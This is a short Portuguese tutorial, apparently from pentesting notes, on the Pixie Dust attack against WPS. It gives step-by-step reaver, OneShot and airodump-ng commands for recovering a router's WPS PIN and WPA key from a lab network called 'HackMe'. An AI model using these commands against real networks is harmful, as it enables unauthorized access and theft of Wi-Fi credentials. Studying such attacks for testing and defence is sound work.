The Pixie Dust Attack
O Pixie Dust Attack é um método bem conhecido para explorar vulnerabilidades no protocolo WPS (Wi-Fi Protected Setup), usado para recuperar a chave pré-compartilhada (PSK) WPA/WPA2 de uma rede sem fio alvo.
Usando Reaver
Para executar um ataque Pixie Dust com
Reaver
, precisamos de uma interface de rede rodando em modo monitor. Podemos criar uma nova interfacemon0
e habilitar o modo monitor usando os seguintes comandos
iw dev wlan0 interface add mon0 type monitor
ifconfig mon0 up
iwconfig
Quando a interface estiver no modo monitor, procuramos redes Wi-Fi disponíveis com
airodump-ng
.
airodump-ng mon0 --wps
A saída revela uma rede WPS WiFi chamada
HackMe
. Podemos usar o Reaver para executar um ataque Pixie Dust contra ela, especificando a opção-K
(ou ).--pixie-dust
reaver -K 1 -vvv -b 86:FC:9F:5D:67:4E -c 1 -i mon0
O ataque Pixie Dust foi bem-sucedido, e o PIN
32552273
foi recuperado. Podemos usar esse PIN posteriormente para obter o PSK (Pre-Shared Key) para a rede WiFi.
reaver -b 86:FC:9F:5D:67:4E -c 1 -p 32552273 -i mon0
Usando Oneshot
Para executar um ataque Pixie Dust usando OneShot , novamente exigimos que nossa interface esteja no modo monitor. No entanto, antes de prosseguir, devemos excluir a
mon0
interface configurada anteriormente.
iw dev mon0 del
iwconfig
Agora, podemos usar o comando
airmon-ng
para definir nossawlan0
interface no modo monitor.
airmon-ng start wlan0
Similar ao Reaver, o OneShot também inclui o argumento
-K
(ou--pixie-dust
). Vamos aplicar essa opção e iniciar o ataque.
python3 /opt/OneShot/oneshot.py -b 86:FC:9F:5D:67:4E -i wlan0mon -K
Last updated